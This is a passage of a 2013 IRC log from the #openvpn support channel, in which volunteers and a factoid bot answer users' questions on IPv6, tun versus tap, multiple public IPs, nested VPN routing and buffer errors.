[Read error: Connection reset by peer] 13:57 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 13:59 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 14:00 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has quit [] 14:25 < havoc> wow, 2.3.0 not even in Experimental yet 14:29 < havoc> checkinstall it is 14:30 < havoc> well, was gonna be anyway, I just wanted to re-verify the file structure 14:41 -!- ade_b [~Ade@78.65.176.141] has joined #openvpn 14:41 -!- ade_b [~Ade@78.65.176.141] has quit [Changing host] 14:41 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 14:43 -!- sedulous [~sedulous@unaffiliated/sed/x-0159859] has joined #openvpn 14:44 < sedulous> Hey. The change log for OpenVPN 2.3 says "full IPv6 support". Does that mean you can have a pure IPv6 VPN now? 14:44 < sedulous> (... on layer 3, it was already possible on layer 2 of course) 14:45 < sedulous> The last time I tried it, IPv6 on L3 with an address pool worked but you still had to use IPv4 in parallel 14:50 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 14:56 -!- jaimevg123 [~ingenieri@190.26.239.145] has joined #openvpn 15:13 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has quit [Ping timeout: 276 seconds] 15:18 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has joined #openvpn 15:19 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has quit [Quit: troker] 15:22 -!- amir_ [~amir@unaffiliated/amir] has quit [Remote host closed the connection] 15:22 -!- amir__ [~amir@178.209.43.160] has joined #openvpn 15:22 -!- amir__ [~amir@178.209.43.160] has quit [Changing host] 15:22 -!- amir__ [~amir@unaffiliated/amir] has joined #openvpn 15:32 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 15:34 -!- william_ is now known as khem_ 15:37 <@plaisthos> sedulous: still need to have a IPv4 address pool 15:37 <@plaisthos> sedulous: It is the first released version with IPv6 Layer3 support 15:47 <+EugeneKay> I don't think you're required to have ipv4 pool 15:50 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 15:53 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has quit [Quit: Ex-Chat] 15:55 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:56 < sedulous> plaisthos: thnks 15:56 < sedulous> plaisthos: yes, what i tried a few month ago was 2.3_rc* 16:02 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 16:02 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.] 16:02 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 255 seconds] 16:04 -!- dazo is now known as dazo_afk 16:23 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 16:41 -!- jaimevg123 [~ingenieri@190.26.239.145] has left #openvpn [] 16:42 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 16:43 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 248 seconds] 16:43 -!- Devastator [~devas@unaffiliated/devastator] has quit [] 16:54 -!- mcp [~mcp@wolk-project.de] has quit [Ping timeout: 252 seconds] 17:01 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has joined #openvpn 17:01 -!- mcp [~mcp@wolk-project.de] has joined #openvpn 17:02 < CrashTM> I have a server with mutiple public ips, how might i go about configuring openvpn 17:03 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 260 seconds] 17:19 < pekster> You might configure openvpn to use one of your public IPs 17:25 < CrashTM> would that be in the client config? 17:25 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 17:26 < pekster> The client needs the IP or hostname resolving to the IP the server is listening on, yes 17:33 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 276 seconds] 17:34 < CrashTM> ok so in my client config it says "remote 69.x.x.x 1194" 17:35 < CrashTM> 69.x.x.x is the first of the two ips if i change the 69.x.x.x to one of the other public ips for example 65.x.x.x the person connecting will get the ip 65.x.x.x and not 69.x.x.x 17:40 -!- lickalott_ [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 17:42 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 17:44 < CrashTM> ? 17:44 < pekster> I didn't see a question there 17:44 < CrashTM> Would that work? 17:45 < pekster> The connectiong person doesn't "get" the IP of your remote peer. Only 1 host can ever "have" a specific public IP 17:45 < pekster> You should try re-phrasing your question 17:45 -!- p3rror [~mezgani@2001:0:53aa:64c:3853:4c1b:d606:f491] has joined #openvpn 17:47 < CrashTM> what would i need to do to give a client a specific public ip 17:48 < pekster> Ah, that's the question you should have asked from the beginning if it's what you wanted 17:49 < CrashTM> sorry if i have not been clear 17:49 < pekster> If you get your IPs on this server via an Ethernet link, you may be better off providing a tap connection to the client. You can mess around with a 1:1 NAT, but that's a bit messy 17:50 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Quit: Laterz] 17:51 < pekster> You can't use tun and have the client hold the public IP directly across OpenVPN unless the traffic is routed to you; if the 2nd IP is expected to be on the Ethernet link, you need an actual Ethernet host connected to respond to the ARP 17:52 < CrashTM> well i already have the server running and wotking. It currently has 1 public ip. i wanted to see what i had to do if i added an ip inorder to use that added ip with my openvpn server, what would i need to do for that 17:54 -!- lickalott_ is now known as lickalott 17:55 < pekster> I'm not exactly sure what you're trying to do by givinig the client its own public IP across the VPN link, but you basically have 3 choices 17:55 < pekster> 1) Create an Ethernet bridge on the public interface of the server, and the client connects via tap to that bridge to get/set the IP 17:55 < pekster> 2) Have the server own both public IPs, give the client an rfc1918 IP across the VPN, and perform 1:1 NAT 17:56 < pekster> 3) Have the ISP route the 2nd IP to you instead of treating it on-link 18:04 -!- osirisx11 [~osiris@93.114.44.253] has joined #openvpn 18:04 < osirisx11> hi all, how can i force openvpn initialize after boot - and start my wifi also? 18:05 < osirisx11> and vpn info is stored on a portable drive that i would insert 18:05 < pekster> You'd need some OS-level magic to know when the USB drive was inserted and take action based on it; that doesn't really work "on boot" due to the dynamic nature of removable media 18:06 < pekster> Besides that point, configure openvpn to start however you'd like on that event and it'll just keep retrying if the network is down 18:12 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [] 18:17 < CrashTM> the idea behind my openvpn server is to pretty much obfuscate my personal ip 18:17 < CrashTM> i wanted to get a second ip from my host and add that to my openvpn server 18:18 < pekster> I just use a proxy to the same effect for proxy-aware applications (I've got a browser profile that uses FoxyProxy that connects to an IP on a rfc1918 VPN running on a hosted cloud server) 18:19 < pekster> You can do what you propose too, it just involves a bit more netwowrk stuff to set up 18:20 < CrashTM> any idea on how i might use that second ip with my openvpn server? 18:21 < pekster> ... 18:21 < pekster> I just told you your 3 choices. Pick one and implement it 18:21 -!- p3rror [~mezgani@2001:0:53aa:64c:3853:4c1b:d606:f491] has quit [Ping timeout: 245 seconds] 18:22 < CrashTM> sorry, i was unsure if my options changed fior what i wanted to do 18:22 < CrashTM> whaat do you think would be the best 18:22 < CrashTM> for* 18:22 < pekster> A proxy, which is why I suggested it. That doesn't quite meet your original stated goal, but it might achieve the same effect if your applications you intend to use are proxy-aware 18:23 < pekster> Otherwise, it all depends on your preference. tap involves less trickery, but you loose some efficiency due to larger headers and ARP traffic. tun+NAT is slightly more efficient but has the hassle of setting up NAT rules. routing is eaiser, but requires your ISP to support that 18:24 * pekster shrugs 18:24 < pekster> End of the day it all "works", just a matter of how you want to do it 18:24 < CrashTM> ah 18:24 < CrashTM> i would use a proxy but most of the programs that i use are not proxy aware 18:37 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 18:40 -!- osirisx11 [~osiris@93.114.44.253] has quit [Ping timeout: 245 seconds] 19:01 -!- p3rror [~mezgani@2001:0:53aa:64c:1c9f:6d6c:d606:f491] has joined #openvpn 19:06 -!- osirisx11 [~osiris@93.114.44.253] has joined #openvpn 19:12 -!- marcolepsy [~marcoleps@64-121-192-7.c3-0.eas-ubr2.atw-eas.pa.cable.rcn.com] has joined #openvpn 19:12 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:12 < marcolepsy> I have both OpenVPN and Hamachi VPNs configured on my Raspberry Pi (debian wheezy). Each routes traffic over separate interfaces (tun0 and ham0 respectively). Everything works fine except quite slow when run together. Not slow when run separately. Any ideas? 19:14 -!- osirisx11 [~osiris@93.114.44.253] has quit [Ping timeout: 276 seconds] 19:16 < pekster> marcolepsy: They're completely unrelated; there's no reason for one to interfere with another unless you're routing the encapsulating traffic for one VPN through another 19:16 < pekster> (which might happen transparently if, for example, you override the default gateway ine one) 19:22 < marcolepsy> It's strange... I start Hamachi first, then after it's up and running, I start OpenVPN. With consistently, my ping times go from 4 ms to 600 or so on average a few minutes after I start the OpenVPN daemon. 19:23 < pekster> pings to what? Taking what route? 19:24 < marcolepsy> Sorry, pings to another client in Hamachi mesh network. 19:24 < marcolepsy> ... going over the Hamachi interface 19:25 < pekster> I don't know anything about thte hamachi VPN. Sounds to me like perhaps you're messing with the gateway as part of your openvpn setup causing the encasulating protocol traffic for the other VPN to take a different route 19:25 < pekster> Just a guess though 19:30 < marcolepsy> Would "ip -s route get " definitively tell me whether the route for that IP is affected? It does not change after starting Hamachi. 19:30 < marcolepsy> I've also run "traceroute ", and the result is the same both before and after. 19:31 < pekster> Won't help 19:31 -!- osirisx11 [~osiris@99-62-233-186.lightspeed.mdsnwi.sbcglobal.net] has joined #openvpn 19:32 < pekster> You need to know if the *encapsulating* protocol is being redirected, not the inside tunnel 19:32 -!- osirisx11 [~osiris@99-62-233-186.lightspeed.mdsnwi.sbcglobal.net] has quit [Client Quit] 19:32 < pekster> I have 12 hops to my IPv6 tunneling provider, but a trace treats it as "one hop" becuase it's occurring inside the tunnel 19:33 < pekster> Optionally, pastebin your server & client openvpn configs to see if you're messing with routes/gateways at all on connect 19:33 < marcolepsy> Ah, I see. Thanks. That doesn't solve my problem but is helpful for my understanding. I'm obsessing over more for sake of understanding what's going on than for any important practical reason. 19:34 < pekster> At the end of the day your issue isn't actually caused by openvpn, just how you're choosing to route across it. OpenVPN is not aware of or able to communicate with any other VPN protocol 19:34 < pekster> It can interact with your OS to a degree, including changing your routing table and calling external scripts/programs 19:35 < marcolepsy> Yes, I mean really I'm trying to skip routing across OpenVPN for this traffic altogether. I'd like to say, "don't touch any traffic sourced from or sent to this IP range". 19:36 < pekster> That's the defualt behaviour of openvpn; you need to explicitly configure it to route non-VPN-network traffic acrosss it 19:36 < pekster> (which is why I need to see server+client configs to say either way for you.) 19:37 < pekster> OpenVPN does not mess with your routes unless you ask it to (the virtual link expected, of coruse) 19:37 < pekster> excepted* 19:39 < pekster> Further reading can be found in the manpage under the directives: --route and --redirect-gateway 19:41 < marcolepsy> Well, I'm certainly not asking you to figure this out for me, but in case you'd like to see the configuration files, I'm using the unmodified files for UDP 53 from http://www.vpnbook.com/#pricing 19:41 <@vpnHelper> Title: VPNBook | 100% Free VPN Service - OpenVPN and PPTP (at www.vpnbook.com) 19:41 < marcolepsy> I will pastebin so you don't have to download the zip. 19:42 < pekster> That won't really help unless you have both sides of the config 19:42 < pekster> Directives can be pushed 19:42 < marcolepsy> Ah, nope, I don't. I see. 19:43 < pekster> You can avoid pulling some options, although that may break things you "expect" to happen when you connect 19:43 < pekster> Reading about that can be had in the manpage under these options: --route-nopull & --route-noexec 19:44 < pekster> !provider 19:44 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team. 19:45 -!- raidz is now known as raidz_away 19:46 < marcolepsy> Haha. I follow. Again, I'm not dying to get this working. I'm more interested in understanding what's going on to understand each of the two services a bit better, but even moreso tunneling more generally. 19:46 < marcolepsy> Thanks for providing some leads. 19:47 < pekster> You have a VPN in a VPN 19:48 < pekster> Traffic inside the inner VPN gets encapsulated in another protocol's packet. It then gets wrapped in another VPN protocl's packet and sent to that VPN peer. It decapsulates the first VPN's encasulating packet, and sends it to the destination. That peer then decausulates the traffic and sends it to the original destination 19:48 < pekster> It all works backwards for reply traffic 19:48 < pekster> Any one of those points could slow the traffic down 19:50 < marcolepsy> Ah, see I thought I had a VPN running *next to* another VPN, where they wouldn't interface or interfere with one another. Maybe I will pursue this with VPNBook to see if they can provide some explanation about what happens on their end. I doubt I will get much from Hamachi, although they do have a community forum. 19:52 < pekster> They're clearly pushing 'redirect-gateway'. Go read about how openvpn works, since they're not likely to change things for a single customer 19:52 < pekster> Log at 'verb 4' and view your logs to see exactly what's going on 19:52 < pekster> I gave you all the references you need to look up in the manpage 19:52 < pekster> (If you don't want that option, read about the override choices you have) 19:53 < pekster> Nothing to do with them if you want to change your config 19:53 < marcolepsy> Perfect. Thanks very much. 19:59 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 20:05 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Ping timeout: 260 seconds] 20:14 -!- JPeterson [~JPeterson@213.103.210.215] has joined #openvpn 20:40 -!- ownermint [~owner@72-161-164-75.dyn.centurytel.net] has joined #openvpn 20:41 < ownermint> hello: I'm having with OSI Layer: 2 (ethernet bridging). http://pastebin.com/BVHd14kp any ideas? 20:42 < pekster> Firewall most likely 20:42 < pekster> Also, the obvious question "do you actually need bridging/tap" applies: 20:42 < pekster> !tunortap 20:42 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 20:42 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 20:42 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn 20:43 < ownermint> Yes, #4 and I have tap installed on win 7 x64 20:44 < pekster> Depends on the game then, I suppose. Some games use network broadcasts, but if you don't mind using IPs or DNS, tun tends to work fine too (minus subnet "auto game discovery stuff.") That said, you may actually want tap, so that's a valid choice here 20:44 < pekster> Since you can ping the VPN server, you know connectivity is working. Sounds like a firewall, probably on the server, not forwarding the traffic 20:45 < pekster> Well, "forwarding" in the Layer 2 sense, not the IP/routing sense 20:45 < ownermint> this is an access server 20:45 < pekster> Then you're in the wrong place 20:45 < pekster> !as 20:45 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 20:45 < pekster> This channel is for the GPL OpenVPN project 20:45 < ownermint> ok thanks I see that now 20:46 -!- ownermint [~owner@72-161-164-75.dyn.centurytel.net] has left #openvpn ["Leaving"] 21:01 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has quit [Ping timeout: 245 seconds] 21:11 -!- ownermint [~owner@72-161-164-75.dyn.centurytel.net] has joined #openvpn 21:11 < ownermint> !wins 21:11 <@vpnHelper> "wins" is http://oreilly.com/catalog/samba/chapter/book/ch07_03.html is a good link for seeing how to run WINS on samba 21:16 -!- Guest20058 [~root@94.249.242.85] has joined #openvpn 21:17 -!- Guest20058 [~root@94.249.242.85] has left #openvpn [] 21:18 -!- CrashTM [~CrashTM@98.144.34.109] has joined #openvpn 21:21 -!- ownermint [~owner@72-161-164-75.dyn.centurytel.net] has left #openvpn ["Leaving"] 21:32 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 21:39 -!- Netsplit *.net <-> *.split quits: MeanderingCode_, colo-work 21:47 -!- colo-work [~jt@78.142.138.4] has joined #openvpn 22:05 -!- p3rror [~mezgani@2001:0:53aa:64c:1c9f:6d6c:d606:f491] has quit [Ping timeout: 245 seconds] 22:10 -!- CrashTM [~CrashTM@98.144.34.109] has quit [Quit: Leaving] 22:23 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] --- Day changed Tue Feb 12 2013 01:07 -!- b1rkh0ff [~b1rkh0ff@178.77.7.226] has quit [Ping timeout: 276 seconds] 01:13 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 01:18 -!- b1rkh0ff [~b1rkh0ff@178.77.19.125] has joined #openvpn 01:19 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 248 seconds] 01:41 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Quit: k1ngdom.net] 01:42 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 01:45 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 01:47 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 01:49 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 02:17 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds] 02:46 -!- dazo_afk is now known as dazo 03:01 -!- Sickness\ [~stront@unaffiliated/s-work] has quit [Read error: Operation timed out] 03:09 -!- marcolepsy [~marcoleps@64-121-192-7.c3-0.eas-ubr2.atw-eas.pa.cable.rcn.com] has quit [Ping timeout: 245 seconds] 03:16 -!- y4h0 [~yavor@78.128.23.17] has quit [Read error: Operation timed out] 03:18 -!- y4h0 [~yavor@78.128.23.17] has joined #openvpn 03:35 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:35 -!- y4h0 [~yavor@78.128.23.17] has quit [Ping timeout: 245 seconds] 03:36 -!- kobolduk [~kobolduk@178.22.82.249] has joined #openvpn 03:37 -!- AsadH is now known as zz_AsadH 03:38 -!- y4h0 [~yavor@78.128.23.17] has joined #openvpn 03:42 -!- brute11k1 [~brute11k@89.249.235.89] has joined #openvpn 03:43 -!- brute11k [~brute11k@89.249.235.89] has quit [Ping timeout: 245 seconds] 03:48 -!- kobolduk [~kobolduk@178.22.82.249] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 03:56 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit [Remote host closed the connection] 03:59 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 04:18 -!- zz_AsadH is now known as AsadH 04:30 -!- yavor_ [~yavor@78.128.23.17] has joined #openvpn 04:37 -!- Netsplit *.net <-> *.split quits: k1ng, y4h0 04:37 -!- MarKsaitis [~MarKsaiti@194.168.230.106] has joined #openvpn 04:37 -!- Netsplit over, joins: k1ng 04:41 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Read error: Operation timed out] 04:41 -!- Devastator [~devas@unaffiliated/devastator] has quit [] 04:42 -!- CaBa [caba@unaffiliated/caba] has joined #openvpn 04:42 < CaBa> hi 04:43 < CaBa> my vpn connection terminates after a flood of those messages in the client log: 04:43 < CaBa> Feb 12 11:42:15: write UDPv4: No buffer space available (code=55) 04:43 < CaBa> what causes this? 04:44 < pekster> Possibly a routing loop, according to: 04:44 < pekster> !buffer 04:44 <@vpnHelper> "buffer" is when you see write UDPv4: No buffer space available (code=55) you probably have a routing loop. the way to fix this is to get a book on basic networking, preferably a coloring book! 04:46 < CaBa> hm... well the connection actually holds up for quite a while, however, when i get a not of terminal output through an SSH session going through the VPN the connection reproducibly terminates 04:46 < CaBa> s/not/log/ 04:46 < CaBa> s/not/lot/ 04:46 < pekster> Oh, then probably not that suggestion 04:47 < CaBa> the vpn connection is nested in another (PPTP) vpn connection... maybe that makes things tricky 04:55 < pekster> Seemingly lots of results skewed towards OpenBSD online 04:55 < pekster> Does that happen to be your platform? 04:55 < pekster> fbsd too 04:57 < pekster> Maybe it's something weird in the way packets are being queued between the encapsulating VPN tun device and the device it's going to? The buffer is something huge like 9k that you shouldn't normally be filling up before it gets passed to the next layer 05:03 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 05:04 < CaBa> well, it's mac os so it's a "BSDish" backend... 05:06 < pekster> Yea, some mac results in the search too. It just suggests to me that this issue may be OS-specific 05:18 -!- RealRancor [~Rancor@mafiaforum.de] has quit [Ping timeout: 264 seconds] 05:26 < pekster> http://www.mail-archive.com/misc@openbsd.org/msg99875.html 05:26 <@vpnHelper> Title: OpenVPN and traceroute: UDPv4: No buffer space available [SOLVED] (at www.mail-archive.com) 05:26 < pekster> Maybe that's somewhat helpful 05:27 < pekster> Looks like some BSD queuing issue. That message is caused by the underlying packet-handnler of the OS returning the 'ENOBUFS' error, which implies that the device is unable to handle queuing any more data 05:28 < pekster> Not to say you need a fancy hfsc setup, but the stuff about qlimits are possibly relevant, as are your device queue sizes 05:29 < pekster> I had to increase the tun packet buffer up from the default of 100 on some Linux environments a job or two back due to queue limitations 05:46 < CaBa> thanks, i'll look into that 05:48 -!- folivora_ [~out@46.19.34.64] has joined #openvpn 05:48 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 05:49 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 240 seconds] 05:49 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Ping timeout: 240 seconds] 05:49 -!- folivora [~out@46.19.34.64] has quit [Ping timeout: 240 seconds] 05:49 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has quit [Ping timeout: 240 seconds] 05:49 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Ping timeout: 240 seconds] 05:49 -!- thermoman [~thermoman@idle.foobar0815.de] has quit [Ping timeout: 240 seconds] 05:50 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn 05:50 -!- sam1 [~sam@194.236.182.101] has joined #openvpn 05:50 -!- thermoman [~thermoman@idle.foobar0815.de] has joined #openvpn 05:51 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 05:56 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 05:56 -!- [fred] [fred@konfuzi.us] has joined #openvpn 06:00 -!- MarKsaitis [~MarKsaiti@194.168.230.106] has quit [Ping timeout: 255 seconds] 06:00 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 06:03 -!- tMobile4a03 is now known as tyteen4a03 06:05 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has quit [Read error: Operation timed out] 06:05 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn 06:35 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 06:35 -!- mode/#openvpn [+o plaisthos] by ChanServ 06:39 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 256 seconds] 06:51 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 07:01 -!- knobo [~bohmer@80.213.73.254] has joined #openvpn 07:02 < knobo> Do I have to specify the ip of the client in an vpn, or is it enough that the client spcify that it self? 07:03 -!- master_of_master [~master_of@p57B52D17.dip.t-dialin.net] has quit [Ping timeout: 260 seconds] 07:03 < knobo> Maybe I should use the tap, and not tun 07:04 < knobo> I have multiple clients connecting, and one server. 07:04 < knobo> The client should not route traffic between each other. 07:05 -!- master_of_master [~master_of@p57B53160.dip.t-dialin.net] has joined #openvpn 07:37 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 245 seconds] 07:37 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 07:39 <@ecrist> knobo: what are you trying to do? 07:39 <@ecrist> in most cases, tun is correct 07:39 <@ecrist> !goal 07:39 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 07:40 -!- bauruine [~stefan@91.236.116.112] has quit [Max SendQ exceeded] 07:41 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 07:42 -!- p3rror [~mezgani@2001:0:53aa:64c:3407:77b8:d673:9b9f] has joined #openvpn 07:44 -!- khem_ [~x@lotus.redl8.com] has left #openvpn [] 07:45 < knobo> Goal: I have about 30 client computers sitting behind their own firewall, I shall monitor them with nagios on a cloud server. I have autossh/ppp-tunnel from the clients to the server today but it is not very stable. I want to change to openvpn. 07:45 <@ecrist> sounds like you need a regular ol' openvpn setup 07:45 <@ecrist> assign IPs from the VPN server, use a routed setup (not bridged) 07:46 < knobo> The clients tunnel adress is 192.168.1.x, and the server has 192.168.1.1 07:46 <@ecrist> I suggest a different address range 07:46 <@ecrist> !1918 07:46 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet? Try this one: http://scarydevilmonastery.net/subnet.cgi 07:47 < knobo> Why not that address range? it wi within 192.168.0.0/16 range. 07:48 < pekster> It's also a very common /24 for home-network devices and other "pre-configured" NAT devices 07:48 <@ecrist> because it's the default range for every consumer-grade access device 07:48 <@ecrist> there's a high probability you'll run into address space conflicts 07:48 < pekster> Same problem with 192.168.0.0/24 and 10.0.0.0/23 (either of its /24's) 07:49 < knobo> ok, so I should use 192.168.3.0/24 07:49 < pekster> If you can be somewhat sure it's really never going to be in use by one of your remote systems on any of its attached (or upstream) networks, then sure 07:50 < pekster> If there's any doubt, you should pick a much more obscure range. Using something randomly picked in 172.16/12 is usually the "best" bet for avoiding conflicts, but it depends on your situation 07:53 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 07:58 -!- yavor_ is now known as y4h0 08:02 -!- cpm [~Chip@216.169.175.102] has joined #openvpn 08:02 -!- cpm [~Chip@216.169.175.102] has quit [Changing host] 08:02 -!- cpm [~Chip@pdpc/supporter/active/cpm] has joined #openvpn 08:02 -!- cpm [~Chip@pdpc/supporter/active/cpm] has left #openvpn [] 08:04 < knobo> thanx 08:08 -!- cek [~cek@crius.pantheon.fused.net] has joined #openvpn 08:09 -!- cek [~cek@crius.pantheon.fused.net] has left #openvpn [] 08:09 -!- yuri___ [~cek@crius.pantheon.fused.net] has joined #openvpn 08:14 -!- yuri___ [~cek@crius.pantheon.fused.net] has quit [Ping timeout: 276 seconds] 08:30 -!- marcolepsy [~marcoleps@64-121-192-7.c3-0.eas-ubr2.atw-eas.pa.cable.rcn.com] has joined #openvpn 08:30 -!- yuri___ [~cek@78.26.128.206] has joined #openvpn 08:47 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Changing host] 08:47 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 08:58 -!- knobo [~bohmer@80.213.73.254] has quit [Ping timeout: 245 seconds] 09:11 -!- MarKsaitis [~MarKsaiti@194.168.230.106] has joined #openvpn 09:33 < yuri___> test 09:33 < yuri___> How do I tell openvpn track status of interface it's working through? wlan0 goes down periodically and route to vpn peer goes down with it, too. 09:35 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 09:39 -!- str8uplinux [~dschuett@mail.lonemountaintruck.com] has joined #openvpn 09:39 < str8uplinux> what would cause "WARNING: Failed running command (--up/--down): external program exited with error status: 7" I'm trying to manually add/del routes with an up/down script 09:40 < pekster> str8uplinux: Your program exiting with error code 7 would cause that. Add some verbosity to your script to see why, but *your* script is the thing returning that code 09:40 -!- yuri___ [~cek@78.26.128.206] has quit [Ping timeout: 256 seconds] 09:41 -!- yuri___ [~cek@crius.pantheon.fused.net] has joined #openvpn 09:41 < pekster> yuri___: OpenVPN is unaware of sytem interface. See the --keepalive or assorted --ping options to have it reconnect if you loose your interface though. See also: 09:41 < pekster> !keepalive 09:41 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive 09:50 <@plaisthos> You can force a reconnect via management interface 09:57 -!- pa [~pa@unaffiliated/pa] has quit [Quit: Sto andando via] 09:58 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 09:58 -!- MarKsaitis [~MarKsaiti@194.168.230.106] has quit [Ping timeout: 248 seconds] 09:58 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 10:01 -!- AsadH is now known as zz_AsadH 10:05 < `nand`> With an IPv6-compatible kernel, the ‘tap0’ interface created by OpenVPN should automatically get a link-local IPv6 address, right? 10:06 < `nand`> at least, it does for me 10:20 -!- raidz_away is now known as raidz 10:36 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 10:37 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 276 seconds] 10:37 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds] 10:38 -!- nutcase [~nutcase@2605:6400:2:fed5:22:0:b4f1:bd54] has joined #openvpn 10:38 -!- nutcase [~nutcase@2605:6400:2:fed5:22:0:b4f1:bd54] has quit [Changing host] 10:38 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 10:39 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 10:43 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn 10:43 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 245 seconds] 10:55 -!- marcolepsy 